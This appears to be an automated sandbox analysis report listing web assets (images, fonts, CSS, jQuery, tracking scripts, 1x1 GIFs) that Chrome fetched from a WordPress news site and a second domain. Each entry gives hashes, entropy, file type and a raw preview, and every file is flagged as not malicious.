                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(...P..$M.Bk..v...s..z...}K.iv..q._..Z..X....A.~.../._....o-<5.7.8.9..l...~..xG..t.....E....>G.C.T..X.A.._S............r5.. F.;I.....\..~..;.....GK..Wb.<lW9.J.....[z...o.....i..}.9..@...=I.94......-.G....:n....L....8..|..;]cY...>..\J..S..h<...k.....h.H.R..2.....+....|<..'.m<5l..$y..$d.UbB.B...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format, CFF, length 7144, version 1.0
                                                        Category:downloaded
                                                        Size (bytes):7144
                                                        Entropy (8bit):7.925427281785777
                                                        Encrypted:false
                                                        SSDEEP:192:NtVu6b6u5fbeA+TBsN8xtUruMZ12XVDt+1:Hfb6QfbeAUBvtUrtsVDt+1
                                                        MD5:80F6E7A7A6EB44255AEB06A2D5B5EA41
                                                        SHA1:4DED570E00C9C96CC3CF18E770903CB60E360CE4
                                                        SHA-256:E2D3127DA85763E024971C6192F78BECBDF85DB231B3D088C9F8B3777D444EDE
                                                        SHA-512:DEC92CA2AE84D4F690E8A5E44FA5C4362E25B447AF9EA2BD2BD2E3C8620608B57EFFB46AB1A730DB00D2439C0F68666E81E5BD8FE958A7D358601B0831482930
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/dist/font/jegicon.woff
                                                        Preview:wOFFOTTO..........,.........................CFF .......V..'....FFTM...`........v...GDEF...|....... .[..OS/2.......H...`Q.^.cmap............ ..head.......)...6..c.hhea...........$./..hmtx.......)...`.~..maxp..............P.name............3..post........... ....x..Y.t...`.h"Q.....H.y.6$M..d....MB.!<...........$_K3.....c...ml....1-.i...=m.vI..6i.&=}^m.gw.;#.6.n.g..k.............c..0.........Z.Y...H"{VbUF........gg:l...\..../f[....D.]8.Ws.Z,W..Xv.B.u.o.....2WX....hYb...e..Y.6K..m.ZZ-....X..o..%.d2s.E..{.G.'.mL..c4f/..1g..._2.1.`....+fe.7..Y7....-).+.)(..5..;.T.TT..N......e5..9..--......vL.f..^....5.M..%..U.;\...e.%.I..7g.q...F...4I.K.OIO..j...yK.yo.$5.......V.w...54..}J..<.@...9a.:e..N.......(.).VVVT.S^........v.V.W.......E.}......ba.L..2..fZ...fdFaT&...ebL.ie.v..|...b.....f...9..2..>..s....3..2C.Qf..aF.c.q...gY........";.}.}...o.]..+~o...}h...<.>../M.c.gW.q..>...kn..ws.C.Q...).?..d,xnA..[x...'.....g%6.~tn.+k...-.=.........:a._m-.]Y.w..k..C...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 87a, 1 x 1
                                                        Category:downloaded
                                                        Size (bytes):35
                                                        Entropy (8bit):3.066054462414549
                                                        Encrypted:false
                                                        SSDEEP:3:M3SLlHh/:f/
                                                        MD5:729C3007A8ED0597531B0C76D54A94BB
                                                        SHA1:90FE9B8A8142548FDFAB29F59CB0A164A0EAEF81
                                                        SHA-256:6A842EA462DACA2A0B5A0F5F25BCFC8E0059AC811CA6C6A1BC54E4D9119621C3
                                                        SHA-512:AC44DA7F455BFAE52B883639964276026FB259320902AA813D0333E021C356A7B3E3537B297F9A2158E588C302987CE0854866C039D1BB0FFB27F67560739DB2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://virtual.urban-orthodontics.com/DMHDyHfjoKFo4/n6OvLv6n+1prgu++Gkba+noWKmnLt4oLe7Lu3hu3jj+fkg47HqNuO5oWCusqtrrLSrLrw=
                                                        Preview:GIF87a........jl...,...........D..;
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 300x300, segment length 16, baseline, precision 8, 1250x1042, components 3
                                                        Category:dropped
                                                        Size (bytes):516887
                                                        Entropy (8bit):7.970962049107982
                                                        Encrypted:false
                                                        SSDEEP:12288:RbMRqo/hZNdj7Uo6a1qMN7mAQXqdLNW5mMVat1:yFezyQaNW5mMw
                                                        MD5:F8BD5150F7556FB20116B4F2094E61AF
                                                        SHA1:D83319B794BC649336DDDCEB61B33A3AD77467A8
                                                        SHA-256:8731AA96EC8AA1EEFA6A3331DEA9207D30D79DFB70B0E71A83DD635190AECC7D
                                                        SHA-512:078DA7409D823F35E52C82B478F29E3FC3ECE4DB2A7096099061918D7B02100A43DA1F8A76169039B308CE7963B6E82E5144E571128D83140D2EFACBA091C096
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:......JFIF.....,.,.....,Photoshop 3.0.8BIM.........,.......,.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Refer
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 300 x 120, 8-bit/color RGB, non-interlaced
                                                        Category:dropped
                                                        Size (bytes):64477
                                                        Entropy (8bit):7.090242474888688
                                                        Encrypted:false
                                                        SSDEEP:1536:6N6MB/RAuSoH03d3dclr9xPOnMwfW6FXuvxDbCSV+gheW1Ko5:I6I/FDHM3QzMWBd/VleW1Ko5
                                                        MD5:1C8F311DA53146CF8C9A8A58933F96F7
                                                        SHA1:1CD0098D8063B79F0B1D63F4C360ECD19F2D2B78
                                                        SHA-256:008517D7B601D77AAF549CF91272E78C7E828BFF0234CFB569B20D8495B348E9
                                                        SHA-512:93476E47D4BC01F8FD300AC235218A8F9F12293C159E38E42D752FAA22F769FA59495330A4B138A86F3532E9F777660543EF04FF72510D7D71D176CE558E649A
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.PNG........IHDR...,...x......wXw....pHYs...#...#.x.?v....iCCPPhotoshop ICC profile..x..]l.U....93k..U.-I...!.Y.(........n.-..D...c...........P.......D..D.Bn0....1.p..'$$.(........7.............I.f.P..Yk....B..XA7+*v.gJ."@..].]...#........Z1-...........A.O..!..l?..!..@..?1.....Z..@.T...t.....N..].LC.$.;..k.8.......rl.\.Z%.:........f...Z`e03......+..@.$N..(..$..9..[.]?....\..... 9XU..#...7...w...^.VA.[ojx.U{...&.u..[.CE..4....Zm.j.G"].:-sy...7g.{....y07._.<\..n.._..)...&.B9.....R......HK.d..]....`.+.P..j..{...i]..[.U.-.....j..|....S/Io.../QA.`.....,...b.hP.....C.....L!..A.0..%@RB.Z.......(.l.z>..E.?.........O...OC..i.M...Q.;.v.%...]"'._.h.b.Y...y.&..2..r........ X........%.p.f.+....[qGG..~M.._..W..N...>...W.....;..tV.....Y$..26..8.#_=..$N.xq.#U.xw../..)_..=......).g.R...G..w........y,.vV.F.N.D.2vV......-..Z.Ys....3.O.......b......}nq..{...m....b7 .038.U.x8.@.....q.V...[..}.{..!...y#gd..MF....cd:...#g.....=..^fR..!.@.?..Z=.....
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):160861
                                                        Entropy (8bit):4.715613201895198
                                                        Encrypted:false
                                                        SSDEEP:768:RwLHD1ZjiwgtrpjqLjRe6mPFPV2efFpjo4k+xb+05kRzZS/fxTMb14XrmcTYsBXk:RwH8bk/GB78
                                                        MD5:6BA20D30A894E6A3877DC9D3D08FE3BF
                                                        SHA1:3B11B9B7773D32DCF645823F639DE7B1EB5D0C55
                                                        SHA-256:890EF7587042AD5EE2374F9FBC013CEC31E1DA956A0A545BFC96EC7C93C25183
                                                        SHA-512:93AE01FD07D3B7C8807C08EC31371D2526EC6DBF4F93CBC8EDCBAEE91918266EE1BDA64A2637D05D7D695894C385F9503076446AAF5CA08AB73133E2B7F78F8C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/user-registration/assets/css/user-registration.css?ver=4.1.0
                                                        Preview:.ur-h2,.ur-h3,.ur-h4{font-weight:600!important}.ur-h2{font-size:28px!important}.ur-h3{font-size:20px!important}.ur-h4{font-size:16px!important}.ur-text-center{text-align:center}.ur-text-right{text-align:right}.ur-text-muted{color:rgb(182.4993283582,186.8632089552,206.5006716418)}@font-face{font-family:UserRegistration;src:url(../fonts/UserRegistration.eot?nk6vrg);src:url(../fonts/UserRegistration.eot?nk6vrg#iefix) format("embedded-opentype"),url(../fonts/UserRegistration.ttf?nk6vrg) format("truetype"),url(../fonts/UserRegistration.woff?nk6vrg) format("woff"),url(../fonts/UserRegistration.svg?nk6vrg#UserRegistration) format("svg");font-weight:400;font-style:normal;font-display:block}@font-face{font-family:UserRegistration;src:url(../fonts/UserRegistration.eot?v5p6f);src:url(../fonts/UserRegistration.eot?v5p6f#iefix) format("embedded-opentype"),url(../fonts/UserRegistration.ttf?v5p6f) format("truetype"),url(../fonts/UserRegistration.woff?v5p6f) format("woff"),url(../fonts/UserRegistratio
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):13957
                                                        Entropy (8bit):5.1691995095169725
                                                        Encrypted:false
                                                        SSDEEP:192:XheCmDcTKGYURT5ZJKA359SYWElaiXTYBvxs11QeB+u1ffL50zvbVSzA:XhADUJKafxWMaBs11hkUyvbVSzA
                                                        MD5:4F8FFEAC0745D408D1723513003DFD43
                                                        SHA1:16C9CD76333F683D91DAD212FEC3C5DF85BA34E1
                                                        SHA-256:613D194F5DE0C897E50127E7A8943E569DFAC839E8F074BAC8C7A840F243F745
                                                        SHA-512:31A7C5E4BF9CDC4A1BB68EAEB13359175EDB1533084BC7A8DC9E84779E8D71EC6D650275E99276A5BC7EA0E1975440D20C7473BAE2D2915712CCC4D2ACBEB765
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/leaky-paywall//css/issuem-leaky-paywall.css?ver=4.21.7
                                                        Preview:/* CSS Document */...leaky_paywall_message_wrap {...position: relative;...width: 100%;...margin: -5em auto 2em;...padding: 6em 0 0;...background: linear-gradient(to bottom, rgba(255,255,255,0), rgba(255,255,255,0.5) 0.5em, #fff 5.5em, #fff 100%);..}....#leaky_paywall_message {...box-shadow: 0 0 0.5em 0.25em rgba(0,0,0,0.125);.. padding: 1.375em;.. border: .5em solid #FFFFFF;.. -webkit-border-radius: .5em;...-moz-border-radius: .5em;...border-radius: .5em;...background-color: #e3e3e3;...color: #333333;...font-size: 1em;.. line-height: 1.625;..}....#leaky_paywall_message a {...color: inherit;...font-weight: 600;..}....#leaky_paywall_message a:visited,..#leaky_paywall_message a:hover,..#leaky_paywall_message a:active,..#leaky_paywall_message a:focus {...color: inherit;..}.....leaky_paywall_subscription_options {...display: flex;...flex-wrap: wrap;...justify-content: space-between;..}.....leaky_paywall_subscription_option {...margin-bottom: 1em;...width: 32%;...padding: 1em;..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:dropped
                                                        Size (bytes):603
                                                        Entropy (8bit):5.259148397734151
                                                        Encrypted:false
                                                        SSDEEP:12:TMHdAEIMu5E4BL/KYf3Xgom0+7qjBJjHvBZ7qjBJjH3B85:2drx8LfHgomz7qj3jHZZ7qj3jHx85
                                                        MD5:EFCAB8BF884589647ACF3B590A377E0C
                                                        SHA1:2031F1FC39392B94EF558EDC4BB07EDBEC851B11
                                                        SHA-256:85C80D0D0DE30AAF22606441EFF01AEA81AD4AE1CCC0C4AB83431CDF0417200E
                                                        SHA-512:B170BEFDB820CD720E5266C57006FF44D7425F6CC24F35D9BB046036C35685600FADC366F5392B18862E207D4C41FF9BDCBDF1B6BF95C0FE77E0984F1DC52D3C
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="20px" height="20px" viewBox="0 0 20 20" enable-background="new 0 255 20 20" xml:space="preserve">.<g>..<line fill="none" stroke="#FFFFFF" stroke-width="2" stroke-miterlimit="10" x1="2" y1="2" x2="18" y2="18"/>..<line fill="none" stroke="#FFFFFF" stroke-width="2" stroke-miterlimit="10" x1="18" y1="2" x2="2" y2="18"/>.</g>.</svg>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):203
                                                        Entropy (8bit):5.139523437629011
                                                        Encrypted:false
                                                        SSDEEP:6:pn0+t9xqObRKr6TQzetSzRx3G0CezowoG:J0+t9xqeRKWTQzetSzRxGezn
                                                        MD5:A368EBDB8002FBB3142E16BC34B326D8
                                                        SHA1:E727C702FB6BE3CBEFA0B0847717B2334CE9B8FD
                                                        SHA-256:7BB4BE9184710E7D3067CE155A3F8E37C248BDF649906EA40AF66A324ACE61A4
                                                        SHA-512:2550B4B0040F566D106E24E8180DE41225FEDA5B82C68A31BC7DBCF422B6751CC1701CD3F1CC51A7FFDBD57FDCDCCABF1F3B6444AFDA681221F8E6F734C40DAD
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">..<html><head>..<title>404 Not Found</title>..</head><body>..<h1>Not Found</h1>..<p>The requested URL was not found on this server.</p>..</body></html>..
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):114
                                                        Entropy (8bit):4.484899257710424
                                                        Encrypted:false
                                                        SSDEEP:3:YGK26+FJoL3pFmFWeFynAIQQAWRyBdBE5WiRbL+Yn:YGK2MeWeF3xWR0y5DRbL+Y
                                                        MD5:9FBD20C89A4470178F909345C22E5FB9
                                                        SHA1:6FDBCC2A684A32D3016D5DC75956412F8C6B1E36
                                                        SHA-256:321227FE038FC2F282FD904A174FBAF931EB5D763CE64EDED0E6A3F31D32119F
                                                        SHA-512:0AB1679B5EE8F9D85C42792C3B4B77E61D139509FECC82D11F8B32AD4EC6982B9F2C9469C143F2B29371C8873FF03937A346FFB189DC4124ADC7AB89E2979AE3
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:{"code":"rest_no_route","message":"No route was found matching the URL and request method.","data":{"status":404}}
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:SVG Scalable Vector Graphics image
                                                        Category:downloaded
                                                        Size (bytes):603
                                                        Entropy (8bit):5.259148397734151
                                                        Encrypted:false
                                                        SSDEEP:12:TMHdAEIMu5E4BL/KYf3Xgom0+7qjBJjHvBZ7qjBJjH3B85:2drx8LfHgomz7qj3jHZZ7qj3jHx85
                                                        MD5:EFCAB8BF884589647ACF3B590A377E0C
                                                        SHA1:2031F1FC39392B94EF558EDC4BB07EDBEC851B11
                                                        SHA-256:85C80D0D0DE30AAF22606441EFF01AEA81AD4AE1CCC0C4AB83431CDF0417200E
                                                        SHA-512:B170BEFDB820CD720E5266C57006FF44D7425F6CC24F35D9BB046036C35685600FADC366F5392B18862E207D4C41FF9BDCBDF1B6BF95C0FE77E0984F1DC52D3C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/ajax-login-and-registration-modal-popup/assets/img/cd-icon-close.svg
                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. width="20px" height="20px" viewBox="0 0 20 20" enable-background="new 0 255 20 20" xml:space="preserve">.<g>..<line fill="none" stroke="#FFFFFF" stroke-width="2" stroke-miterlimit="10" x1="2" y1="2" x2="18" y2="18"/>..<line fill="none" stroke="#FFFFFF" stroke-width="2" stroke-miterlimit="10" x1="18" y1="2" x2="2" y2="18"/>.</g>.</svg>.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (65447)
                                                        Category:downloaded
                                                        Size (bytes):87553
                                                        Entropy (8bit):5.262620498676155
                                                        Encrypted:false
                                                        SSDEEP:1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKO:sHNwcv9VBQpLl88SMBQ47GKO
                                                        MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                        SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                        SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                        SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                        Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 87a, 1 x 1
                                                        Category:downloaded
                                                        Size (bytes):35
                                                        Entropy (8bit):3.066054462414549
                                                        Encrypted:false
                                                        SSDEEP:3:M3SLlHh/:f/
                                                        MD5:729C3007A8ED0597531B0C76D54A94BB
                                                        SHA1:90FE9B8A8142548FDFAB29F59CB0A164A0EAEF81
                                                        SHA-256:6A842EA462DACA2A0B5A0F5F25BCFC8E0059AC811CA6C6A1BC54E4D9119621C3
                                                        SHA-512:AC44DA7F455BFAE52B883639964276026FB259320902AA813D0333E021C356A7B3E3537B297F9A2158E588C302987CE0854866C039D1BB0FFB27F67560739DB2
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://virtual.urban-orthodontics.com/mMawr+Pk08b85IqdrvWcjeuy1d+6/JLD+ajUxvah79zsp8TcuuqS3Ozkipy05MKNouTV3f6y18viq5LS
                                                        Preview:GIF87a........jl...,...........D..;
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:downloaded
                                                        Size (bytes):143516
                                                        Entropy (8bit):7.976877343636748
                                                        Encrypted:false
                                                        SSDEEP:3072:F3kfZMmNtKT9gk4O0EqbrIkzxba0rYkaiHv:F3kNiTG6qbrIHliP
                                                        MD5:89CED6C7F0A7F6752258E96E96398723
                                                        SHA1:D03EE626195D3F3A63505596CFC3D18D85C2013E
                                                        SHA-256:A36CBCB381F533927714F1AAA038AE8DA48FBF82C6B8BFD460546CF9CDAD2E1F
                                                        SHA-512:9510063ABFDD8FC60608C78FF8522C28931FE50DF642A8E0E13534AE88CF8F2B15AFF7A3FE3014010174813AE888FA55CF9770BECAD5068DC52A3A47BDB62B4B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/02/dom-section-2-19-25-1_page-0001-750x536.jpg
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(..8.W.Z....o.]...W.Y.!m../....o..W2.I.......Y.8.c.s.=..#..4.<.|5t......C.rM...NrG..%........l.J.I...Ku...i.g.:.@._x....wZ...wl`i....vb.`.........7U...o.I....d.H.......@[I..o..x.6v..._c.Xm..<`V....?.[v....<..@.....F..V...M./.[Nq....,..g...Nr....7N........lr.@yv..c...q..L.\.-4...-..v...Bm
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:Web Open Font Format (Version 2), TrueType, length 77160, version 4.459
                                                        Category:downloaded
                                                        Size (bytes):77160
                                                        Entropy (8bit):7.996509451516447
                                                        Encrypted:true
                                                        SSDEEP:1536:/MkbAPfd1vyBKwHz4kco36ZvIaBfRPlajyXUA2jVTc:L0nXnHdfRVEAS2
                                                        MD5:AF7AE505A9EED503F8B8E6982036873E
                                                        SHA1:D6F48CBA7D076FB6F2FD6BA993A75B9DC1ECBF0C
                                                        SHA-256:2ADEFCBC041E7D18FCF2D417879DC5A09997AA64D675B7A3C4B6CE33DA13F3FE
                                                        SHA-512:838FEFDBC14901F41EDF995A78FDAC55764CD4912CCB734B8BEA4909194582904D8F2AFDF2B6C428667912CE4D65681A1044D045D1BC6DE2B14113F0315FC892
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/themes/jnews/assets/dist/font/fontawesome-webfont.woff2
                                                        Preview:wOF2......-h..........-.........................?FFTM.. .`..r.....(..X.6.$..p..... .....u[R.rGa...*...'.=.:..&..=r.*.......].t..E.n.......1F...@....|....f.m.`.$..@d[BQ.$([U<+(..@P.5..`....>.P..;.(..1..l..h...)..Yy..Ji......|%..^..G..3..n........D..p\Yr .L.P.....t.)......6R.^"S.L~.YR.CXR...4...F.y\[..7n..|.s.q..M..%K......,.....L.t.'....M.,..c..+b....O.s.^.$...z...m...h&gb...v.....'..6.:....s.m.b.1.m0"....*V.....c.$,0ATPT.1.....<..;...`..'.H.?.s.:..ND.....I..$..T..[..b4........,....bl6...IL.i}.&.4.m,'....#....Rw..bu..,K......v....m_-...\H....HH.......?...m..9P...)9.J..$.....8......~.;.r..n.=$.....Nddn.!'....;...8..'.N...!.-..J.........X.=.,......"`:....... {......K!'...-FH....#$~.Z_.......N5VU8F....%.P..........Cp..$.Q.......r.....k.k...3...:R.%....2{.....h%.)8..........ILK.6v.#......,;.6..N.2.hv...........OO..t#....xT..Bf....q^.#....?{.5b.I..%-WZ..b.A...^.1..n5.....NQ.Y'.........S.....!t" .`b3..%....35....fv;....l..9.:jgf?gr..p.x. ..|.. $. e.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:downloaded
                                                        Size (bytes):155561
                                                        Entropy (8bit):7.975118384561663
                                                        Encrypted:false
                                                        SSDEEP:3072:1wFQTDQaYK6pOAX1Ot+RYvY73XRBtOL3g4Pn3j4U6i:ymQaYKO1Ot+RKY7HFObgC3tF
                                                        MD5:555A704936890BB6CEDC5C93AC83DA3D
                                                        SHA1:CB8F83117C71EC1E702F644536EC42607B7B8F55
                                                        SHA-256:B086AF4ACCE73CC510FCBE19EB25013E346E32BD255D190ECB78425E51438DE9
                                                        SHA-512:1FE820B1347C698E3C2859441B0DA157414440F8E66A46785EB8029E070C3CAD8C17263A28E89D5A70C0A9698D2EB4E302FD1B202740D16B13E1D8EBE1F8501B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://storage.googleapis.com/stateless-mountainmedianews-co/sites/35/2025/02/full-section-2-5-25-1_page-0001-750x536.jpg
                                                        Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....(...(....c...]F....C.."Y.#...*...<7.\-...i..%..4`........kW1...E.:.....e...ZFa....,..Lc..h..>...4>..#.6...1.R9......,uX>.Y[^C..w.,....W6.9.....'f.R0T...(...~U..y#9..G.}..z...]..h2..'..bq.2.T..5..=6.[YZ[..:E.a.~...<7..9,....Y_...'.....>.....4e..|.*[..c'd....@...x....O......Vf.2...1..6...|.tS..wVf.{
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:C source, ASCII text, with very long lines (63928), with no line terminators
                                                        Category:downloaded
                                                        Size (bytes):63928
                                                        Entropy (8bit):5.241160376316856
                                                        Encrypted:false
                                                        SSDEEP:1536:h6IDhy6vTvDHuEDzk6+VIlxvzP+08VxfGjvRQP2DMsnuT:ZbkejRc
                                                        MD5:64A0CC2BC23D329C42ACDEAE0C0F86EB
                                                        SHA1:C4E8EC60D831E414BFC8D4C738954C3A94AE3E1C
                                                        SHA-256:8DE6B47BE272E66FF002D2D165B7500E812672ACB52D783F4F44C490556503DD
                                                        SHA-512:3A3FB720C38EAB4878223A027F01865E26C13EBE64348544450F29E1E25A2FBBA177F2968716AE06CE557CB50B4DD8D6A102606536CD1D039B8E27DBE4CF6022
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hardylive.com/wp-content/plugins/metorik-helper/assets/js/metorik.min.js?ver=2.0.9
                                                        Preview:!function(e){var t;"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define([],e):("undefined"!=typeof window?t=window:"undefined"!=typeof global?t=global:"undefined"!=typeof self&&(t=self),t.sbjs=e())}(function(){return function r(i,o,a){function s(n,e){if(!o[n]){if(!i[n]){var t="function"==typeof require&&require;if(!e&&t)return t(n,!0);if(c)return c(n,!0);e=new Error("Cannot find module '"+n+"'");throw e.code="MODULE_NOT_FOUND",e}t=o[n]={exports:{}};i[n][0].call(t.exports,function(e){var t=i[n][1][e];return s(t||e)},t,t.exports,r,i,o,a)}return o[n].exports}for(var c="function"==typeof require&&require,e=0;e<a.length;e++)s(a[e]);return s}({1:[function(e,t,n){"use strict";var r=e("./init");t.exports={init:function(e){this.get=r(e),e&&e.callback&&"function"==typeof e.callback&&e.callback(this.get)}}},{"./init":6}],2:[function(e,t,n){"use strict";var r=e("./terms"),i=e("./helpers/utils"),o={containers:{current:"sbjs_current",cu
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 750x536, components 3
                                                        Category:downloaded
                                                        Size (bytes):128561
                                                        Entropy (8bit):7.966580094902581
                                                        Encrypted:false
                                                        SSDEEP:3072:/yBd4Dp+NVNy+uVSX6ep1afWHp9zv1aEI0Vi/XNaHsRM:/eqDwy3SX6eSfWH7zvEAi/X4sK
                                                        MD5:CF63C75C45F637629EF4CF1CC70E9E66
                                                        SHA1:22C44331913C908D43605589E98CA477BD377BDE
                                                        SHA-256:713B550AEA902327066735B06B542E9F36A10FB04D1B09935FCEBBE5FC17C9D0
                                                        SHA-512:52E9E5366655BC74D2985D437041AFBEDF5CCD98B36BC8198D6E6248863843F16E46EB3CECA4BAC1EF02BB0022FC0A849BF50757CA8481C8B5C0FBA605175E27
                                                        Malicious:false
                                                        Reputation:low
